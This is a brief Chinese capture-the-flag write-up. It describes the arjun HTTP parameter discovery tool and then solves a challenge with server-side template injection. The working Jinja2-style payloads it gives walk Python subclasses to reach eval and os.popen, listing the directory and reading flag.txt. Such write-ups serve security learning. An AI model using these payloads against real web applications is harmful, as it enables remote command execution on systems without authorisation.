知识点
arjun工具:一款功能强大的HTTP参数挖掘套件
使用方法
功能介绍
- 多线程;
- 四种检测模式;
- 常规扫描仅需30秒;
- 基于正则表达式的启发式扫描;
- 提供了25980个可扫描的参数名;
- 只想目标发送30-5个请求即可完成任务;
解题
首页没东西,看源码也没有提示,看wp知道可用arjun获取get或者post参数
查看所有可用模块?name={{().__class__.__bases__[0].__subclasses__()}}
获取warnings.catch_warnings
位置,为182
查看目录?name={{''.__class__.__mro__[1].__subclasses__()[182].__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()")}}
读取flag?name={{().__class__.__bases__[0].__subclasses__()[182].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag.txt').read()")}}